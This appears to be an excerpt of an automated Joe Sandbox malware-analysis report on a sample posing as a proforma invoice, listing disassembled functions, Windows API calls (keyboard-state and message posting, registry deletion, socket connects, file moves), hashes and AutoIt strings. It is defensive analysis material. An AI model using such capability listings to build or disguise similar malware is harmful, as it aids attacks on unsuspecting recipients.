                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 48c96f72bf52eb1bfc8a2808205f2a2f2c56b18db50809c74c8d20931ced30b6
                                                                                                                    • Instruction ID: 88a56f54a746f684d684ce94c7c706bfbe2d70e7062541d271b75f50672df7be
                                                                                                                    • Opcode Fuzzy Hash: 48c96f72bf52eb1bfc8a2808205f2a2f2c56b18db50809c74c8d20931ced30b6
                                                                                                                    • Instruction Fuzzy Hash: F1513460A243D23DFB325A388C65BF7BEA95B06380F488989E5D9458C3C2D8ECF4D751
                                                                                                                    Function 002B0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(00000000), ref: 002B0DA5
                                                                                                                    • GetKeyboardState.USER32(?), ref: 002B0DBA
                                                                                                                    • SetKeyboardState.USER32(?), ref: 002B0E1B
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002B0E47
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002B0E64
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002B0EA8
                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002B0EC9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: cfe1965dc2349d6df31d6297a5e4a3734bf394ca8e01d12cb2d2e393273e7857
                                                                                                                    • Instruction ID: 7e69701d5d3990b01b4d6730dd9647c276c44e0f6ff1452e26a76f77039213d3
                                                                                                                    • Opcode Fuzzy Hash: cfe1965dc2349d6df31d6297a5e4a3734bf394ca8e01d12cb2d2e393273e7857
                                                                                                                    • Instruction Fuzzy Hash: A451F5A09247D63DFB338B648C95BFB7FA99B06340F088889E1D5468C2D795ECA4D750
                                                                                                                    Function 002B55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945705084-0
                                                                                                                    • Opcode ID: e8bdb2dde9bb158ad79eafa90406cd602c3a2faae0c16c657781924afe888a41
                                                                                                                    • Instruction ID: 394bd4af07496a582bbdf691e238687b7640167aa50e2ab486e30e71a012eec4
                                                                                                                    • Opcode Fuzzy Hash: e8bdb2dde9bb158ad79eafa90406cd602c3a2faae0c16c657781924afe888a41
                                                                                                                    • Instruction Fuzzy Hash: E8418375C30614B6CB11EBB48C46ACFB3BC9F05310F50D956E518E3221FB34A665CBAA
                                                                                                                    Function 002AD56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002AD5D4
                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002AD60A
                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002AD61B
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002AD69D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                    • String ID: ,,.$DllGetClassObject
                                                                                                                    • API String ID: 753597075-1173203973
                                                                                                                    • Opcode ID: e4cde0a690fa1ed7f7d166cf20237efa296a9902bc00ce196a362d049cfd57cb
                                                                                                                    • Instruction ID: 6be22daf11dade5192ca90226aa7dcbd5969c14c481bdc347039b74537bfce98
                                                                                                                    • Opcode Fuzzy Hash: e4cde0a690fa1ed7f7d166cf20237efa296a9902bc00ce196a362d049cfd57cb
                                                                                                                    • Instruction Fuzzy Hash: 174191B1610205EFDB05CF54D884B9ABBBDEF45710F1580A9EC0A9F605DBB1DD54CBA0
                                                                                                                    Function 002B3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3697,?), ref: 002B468B
                                                                                                                      • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3697,?), ref: 002B46A4
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002B36B7
                                                                                                                    • _wcscmp.LIBCMT ref: 002B36D3
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002B36EB
                                                                                                                    • _wcscat.LIBCMT ref: 002B3733
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 002B379F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 1377345388-1173974218
                                                                                                                    • Opcode ID: 1585d1ad535aa09a0a50f32689a06240879fb784782137bb6a595afdfdad3e90
                                                                                                                    • Instruction ID: b0f4f65956e632e065bf36a18c0330221394741a42ccfdf5182e67b874c81b2d
                                                                                                                    • Opcode Fuzzy Hash: 1585d1ad535aa09a0a50f32689a06240879fb784782137bb6a595afdfdad3e90
                                                                                                                    • Instruction Fuzzy Hash: 9D41E171518345AEC751EF60C881AEFB7ECAF88380F00482EF48AC3251EB34D699CB56
                                                                                                                    Function 002D7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002D72AA
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7351
                                                                                                                    • IsMenu.USER32(?), ref: 002D7369
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D73B1
                                                                                                                    • DrawMenuBar.USER32 ref: 002D73C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                    • Opcode ID: 2be6601fdce042c548759c8b610eb381390fb8b38bfaff0699f55aa626ec2ab3
                                                                                                                    • Instruction ID: d89cda210bed6e09013fb718adcaedd48c7e06dadb803989f7e650f97f9aff3d
                                                                                                                    • Opcode Fuzzy Hash: 2be6601fdce042c548759c8b610eb381390fb8b38bfaff0699f55aa626ec2ab3
                                                                                                                    • Instruction Fuzzy Hash: B7413875A14209EFDB60DF50E884A9ABBF8FB08310F14856AFD0597350E734ADA0DF50
                                                                                                                    Function 002D0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002D0FD4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D0FFE
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002D10B5
                                                                                                                      • Part of subcall function 002D0FA5: RegCloseKey.ADVAPI32(?), ref: 002D101B
                                                                                                                      • Part of subcall function 002D0FA5: FreeLibrary.KERNEL32(?), ref: 002D106D
                                                                                                                      • Part of subcall function 002D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002D1090
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 002D1058
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 395352322-0
                                                                                                                    • Opcode ID: 7ec8b41dfb17b14494c03a500cf9306a487c27d368443170f5abce41e096081a
                                                                                                                    • Instruction ID: 2025adf52136286dfc368254a625b4e828ffb5d1bdf4651e2a749f32b053cafc
                                                                                                                    • Opcode Fuzzy Hash: 7ec8b41dfb17b14494c03a500cf9306a487c27d368443170f5abce41e096081a
                                                                                                                    • Instruction Fuzzy Hash: A5313C71D11109BFDB149F90ED89EFFB7BCEF08301F10016AE902E2251EA709E959AA4
                                                                                                                    Function 002D62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002D62EC
                                                                                                                    • GetWindowLongW.USER32(00C26378,000000F0), ref: 002D631F
                                                                                                                    • GetWindowLongW.USER32(00C26378,000000F0), ref: 002D6354
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002D6386
                                                                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002D63B0
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 002D63C1
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002D63DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: a265983e5f55e1a70b9c562a97a30c0f883ff57448139c57f0700626e9579af3
                                                                                                                    • Instruction ID: 77ec366786035dcf26e01cd8a39fdb8e71636f38c0e204111bae65d7c8324045
                                                                                                                    • Opcode Fuzzy Hash: a265983e5f55e1a70b9c562a97a30c0f883ff57448139c57f0700626e9579af3
                                                                                                                    • Instruction Fuzzy Hash: 2F31F030650291EFDB61CF58EC88F5437E9BB8AB14F1941A6F9518B2B2CB71AC50DB90
                                                                                                                    Function 002ADAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002ADB2E
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002ADB54
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 002ADB57
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 002ADB75
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 002ADB7E
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 002ADBA3
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 002ADBB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: c083e7916166a343433c7d6ffe10a636e3960a15f496abd68e4292db1ce09836
                                                                                                                    • Instruction ID: ee331e9eca5c8ed045725e10d6119d353e43a7f49b54b2950a0f62ccef59733d
                                                                                                                    • Opcode Fuzzy Hash: c083e7916166a343433c7d6ffe10a636e3960a15f496abd68e4292db1ce09836
                                                                                                                    • Instruction Fuzzy Hash: 2021B636611219AFDF50DFB8DC88CBB73ACEB09364B058526FA16DB260DA70DC4587B4
                                                                                                                    Function 002C6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C7DB6
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C61C6
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C61D5
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C620E
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 002C6217
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 002C6221
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 002C624A
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C6263
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 910771015-0
                                                                                                                    • Opcode ID: dee922297ca507b36f39786349620721357bf10e0cc8a804e2febe49e7f02281
                                                                                                                    • Instruction ID: a06c4b2ce212c400a42c72a14e993200083f385e1bff1c6c0c0302416e5e92d1
                                                                                                                    • Opcode Fuzzy Hash: dee922297ca507b36f39786349620721357bf10e0cc8a804e2febe49e7f02281
                                                                                                                    • Instruction Fuzzy Hash: 2C319031620108ABEF10AF64DC89FBA77A9EB45711F04412DFD06E7291CB70AD549AA6
                                                                                                                    Function 002AF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                    • Opcode ID: 79d8f8eec2691f36dbb09560c0f19b258c488c42b64340516545cb36e1139e0a
                                                                                                                    • Instruction ID: 52b869238bcb2308b8cccbbe63fb792d05e6876e6bf347ca04124425a5b36a80
                                                                                                                    • Opcode Fuzzy Hash: 79d8f8eec2691f36dbb09560c0f19b258c488c42b64340516545cb36e1139e0a
                                                                                                                    • Instruction Fuzzy Hash: 10216772234512A7D230EA74AE02EA7B39CEF57700F508039F84686051EFA89DB5D794
                                                                                                                    Function 002D75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
                                                                                                                      • Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
                                                                                                                      • Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D7632
                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D763F
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D764A
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D7659
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D7665
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    • Opcode ID: ae3d52d6d765703253e8a2542a60f3390c9255478969025d5cdda75de7605e1d
                                                                                                                    • Instruction ID: e7ce0a4a7407673a8980d7f895ff02ff0bc9ad1d2c737dfd62d127650c14da7c
                                                                                                                    • Opcode Fuzzy Hash: ae3d52d6d765703253e8a2542a60f3390c9255478969025d5cdda75de7605e1d
                                                                                                                    • Instruction Fuzzy Hash: 8011B2B2120219BFEF118F64CC85EE77F6DEF08798F014115BA04A21A0DB72DC21DBA4
                                                                                                                    Function 00279AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __init_pointers.LIBCMT ref: 00279AE6
                                                                                                                      • Part of subcall function 00273187: EncodePointer.KERNEL32(00000000), ref: 0027318A
                                                                                                                      • Part of subcall function 00273187: __initp_misc_winsig.LIBCMT ref: 002731A5
                                                                                                                      • Part of subcall function 00273187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00279EA0
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00279EB4
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00279EC7
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00279EDA
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00279EED
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00279F00
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00279F13
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00279F26
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00279F39
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00279F4C
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00279F5F
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00279F72
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00279F85
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00279F98
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00279FAB
                                                                                                                      • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00279FBE
                                                                                                                    • __mtinitlocks.LIBCMT ref: 00279AEB
                                                                                                                    • __mtterm.LIBCMT ref: 00279AF4
                                                                                                                      • Part of subcall function 00279B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00279AF9,00277CD0,0030A0B8,00000014), ref: 00279C56
                                                                                                                      • Part of subcall function 00279B5C: _free.LIBCMT ref: 00279C5D
                                                                                                                      • Part of subcall function 00279B5C: DeleteCriticalSection.KERNEL32(021,?,?,00279AF9,00277CD0,0030A0B8,00000014), ref: 00279C7F
                                                                                                                    • __calloc_crt.LIBCMT ref: 00279B19
                                                                                                                    • __initptd.LIBCMT ref: 00279B3B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00279B42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
